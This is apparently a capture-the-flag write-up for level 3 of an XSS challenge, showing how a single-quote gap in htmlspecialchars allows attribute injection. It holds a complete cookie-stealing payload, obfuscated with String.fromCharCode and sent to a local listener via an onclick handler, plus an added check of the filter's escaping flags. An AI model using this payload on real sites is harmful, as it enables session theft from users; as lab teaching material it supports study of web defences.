
XSS: bypassing a single-quote restriction

Preface

A friend suddenly asked me how to exfiltrate the cookie in level 3 of the XSS challenge. I looked into it myself, and it really isn't that simple, so I'm writing it up here.

There are online versions of the XSS challenge; you can also download one and run it locally.

Level 3

The XSS is in the keyword parameter, whose value is enclosed in single quotes.


Viewing the page source shows which quote character encloses the value. Be aware that what F12 (DevTools) displays is a double quote, while the actual source uses a single quote, so you may still have to guess here. It's an easy guess: if it isn't a single quote, it's a double quote.

Three things to note from the source:

1. This target doesn't seem to set a cookie, so I added a cookie myself.

2. htmlspecialchars is used to filter XSS.

3. The value is closed with a single quote.


So it basically comes down to getting around the htmlspecialchars function. It filters double quotes but leaves single quotes alone.

Even so, the single quote is also what encloses the onclick handler:

keyword=' onclick='alert(123)'

so I decided not to use any single quotes in the JavaScript itself.
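To make the filter gap concrete, here is an added JavaScript model of PHP's htmlspecialchars() under two flag sets (illustrative code, not the challenge's own source); the single-quoted template and the small tag tokenizer are assumptions. It shows the probe above creating a new onclick attribute under the pre-8.1 default flags, and staying inert under ENT_QUOTES, which PHP 8.1 made the default.

```javascript
// Added example (not the challenge's PHP source): a JavaScript model of what
// PHP's htmlspecialchars() escapes under two flag sets, used to check whether
// a keyword value can break out of a single-quoted attribute.
//   ENT_COMPAT  (default before PHP 8.1): & < > "   ( ' is left untouched )
//   ENT_QUOTES  (default since PHP 8.1):  & < > " and '
function htmlspecialchars(s, flags) {
  let out = s
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
  if (flags === "ENT_QUOTES") out = out.replace(/'/g, "&#039;");
  return out;
}

// Level-3 template as assumed from the page: the keyword lands inside a
// single-quoted value attribute.
function render(keyword, flags) {
  return "<input name='keyword' value='" + htmlspecialchars(keyword, flags) + "'>";
}

// Minimal attribute tokenizer for a single tag (assumption: good enough for
// this template). Returns attribute names in the order a parser meets them;
// a breakout shows up as an attribute the template never declared.
function attributeNames(tag) {
  const re = /([A-Za-z-]+)=(?:'[^']*'|"[^"]*"|[^\s>]+)/g;
  const names = [];
  let m;
  while ((m = re.exec(tag)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// True only when the rendered tag carries exactly the declared attributes.
function attributeSafe(keyword, flags) {
  const names = attributeNames(render(keyword, flags));
  return names.length === 2 && names[0] === "name" && names[1] === "value";
}

// The page's probe: a single quote closes value and starts a new attribute.
const probe = "' onclick='alert(123)'";

console.log(attributeNames(render(probe, "ENT_COMPAT"))); // [ 'name', 'value', 'onclick' ]
console.log(attributeSafe(probe, "ENT_COMPAT"));          // false
console.log(attributeSafe(probe, "ENT_QUOTES"));          // true
```

The same check applies to the final fromCharCode payload later on this page: it also begins with a bare single quote, so with ENT_QUOTES it never leaves the value attribute.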

Build the payload, which should be self-explanatory: it sends the cookie to local port 81.

document.write('<img src="http://127.0.0.1:81/?cmd='+document.cookie+'" />');

Then I convert each character to its ASCII code using the charCodeAt function, as follows:

var a = "document.write('<img src=\"http://127.0.0.1:81?cmd='+document.cookie+'\" />');";
var b = '';
// append the character code of every character, separated by spaces
for (var i = 0; i < a.length; i++) {
  b += a[i].charCodeAt() + ' ';
}
console.log(b);

That yields the ASCII codes of every character.

Then I use String.fromCharCode to turn the ASCII codes back into characters. The script is as follows:

var a = "100 111 99 117 109 101 110 116 46 119 114 105 116 101 40 39 60 105 109 103 32 115 114 99 61 34 104 116 116 112 58 47 47 49 50 55 46 48 46 48 46 49 58 56 49 63 99 109 100 61 39 43 100 111 99 117 109 101 110 116 46 99 111 111 107 105 101 43 39 34 32 47 62 39 41 59";
var b = a.split(" ");
var c = '';
// rebuild each character as a String.fromCharCode(n) call, joined with +
for (var i = 0; i < b.length; i++) {
  c += "+String.fromCharCode(" + b[i] + ")";
}
console.log(c);

Remember to remove the leading +.


That leaves no single quotes at all. Then we just have the JavaScript eval function execute the code.

Note, however, that + in a URL is decoded as a space, so one more round of URL encoding is needed: + is encoded as %2b.


After encoding, this is the final payload:

keyword=' onclick='javascript:eval(String.fromCharCode(100)%2bString.fromCharCode(111)%2bString.fromCharCode(99)%2bString.fromCharCode(117)%2bString.fromCharCode(109)%2bString.fromCharCode(101)%2bString.fromCharCode(110)%2bString.fromCharCode(116)%2bString.fromCharCode(46)%2bString.fromCharCode(119)%2bString.fromCharCode(114)%2bString.fromCharCode(105)%2bString.fromCharCode(116)%2bString.fromCharCode(101)%2bString.fromCharCode(40)%2bString.fromCharCode(39)%2bString.fromCharCode(60)%2bString.fromCharCode(105)%2bString.fromCharCode(109)%2bString.fromCharCode(103)%2bString.fromCharCode(32)%2bString.fromCharCode(115)%2bString.fromCharCode(114)%2bString.fromCharCode(99)%2bString.fromCharCode(61)%2bString.fromCharCode(34)%2bString.fromCharCode(104)%2bString.fromCharCode(116)%2bString.fromCharCode(116)%2bString.fromCharCode(112)%2bString.fromCharCode(58)%2bString.fromCharCode(47)%2bString.fromCharCode(47)%2bString.fromCharCode(49)%2bString.fromCharCode(50)%2bString.fromCharCode(55)%2bString.fromCharCode(46)%2bString.fromCharCode(48)%2bString.fromCharCode(46)%2bString.fromCharCode(48)%2bString.fromCharCode(46)%2bString.fromCharCode(49)%2bString.fromCharCode(58)%2bString.fromCharCode(56)%2bString.fromCharCode(49)%2bString.fromCharCode(63)%2bString.fromCharCode(99)%2bString.fromCharCode(109)%2bString.fromCharCode(100)%2bString.fromCharCode(61)%2bString.fromCharCode(39)%2bString.fromCharCode(43)%2bString.fromCharCode(100)%2bString.fromCharCode(111)%2bString.fromCharCode(99)%2bString.fromCharCode(117)%2bString.fromCharCode(109)%2bString.fromCharCode(101)%2bString.fromCharCode(110)%2bString.fromCharCode(116)%2bString.fromCharCode(46)%2bString.fromCharCode(99)%2bString.fromCharCode(111)%2bString.fromCharCode(111)%2bString.fromCharCode(107)%2bString.fromCharCode(105)%2bString.fromCharCode(101)%2bString.fromCharCode(43)%2bString.fromCharCode(39)%2bString.fromCharCode(34)%2bString.fromCharCode(32)%2bString.fromCharCode(47)%2bString.fromCharCode(62)%2bString.fromCharCode(39)%2bString.fromCharCode(41)%2bString.fromCharCode(59))'

This uses the JavaScript pseudo-protocol.

Listen on port 81 locally.


Then submit the keyword parameter.


Then click the input box to trigger onclick. The cookie is received successfully.
